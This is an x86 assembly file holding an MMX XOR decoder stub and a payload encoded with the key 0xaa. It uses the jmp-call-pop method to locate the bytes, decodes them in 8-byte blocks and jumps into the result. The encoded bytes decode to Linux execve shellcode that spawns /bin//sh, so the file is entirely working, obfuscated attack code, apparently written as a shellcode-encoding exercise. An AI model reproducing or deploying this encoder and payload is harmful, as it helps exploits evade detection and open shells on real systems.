global _start
section .text

_start:


jmp short pushOnStack


popShellcode:

pop edi
lea esi, [edi+8]
xor ecx, ecx
mov cl, 0x4

myloop:
movq mm0, qword [esi] ; this shellcode
movq mm1, qword  [edi] ; this is decoder
pxor mm0, mm1
movq qword [esi], mm0
add esi, 0x8
loop myloop

jmp shellcode

pushOnStack:
call popShellcode
decoder: db 0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa,0xaa
shellcode: db 0x9b,0x6a,0xfa,0xc2,0xc4,0x85,0xd9,0xc2,0xc2,0x85,0x85,0xc8,0xc3,0x23,0x49,0xfa,0x23,0x48,0xf9,0x23,0x4b,0x1a,0xa1,0x67,0x2a
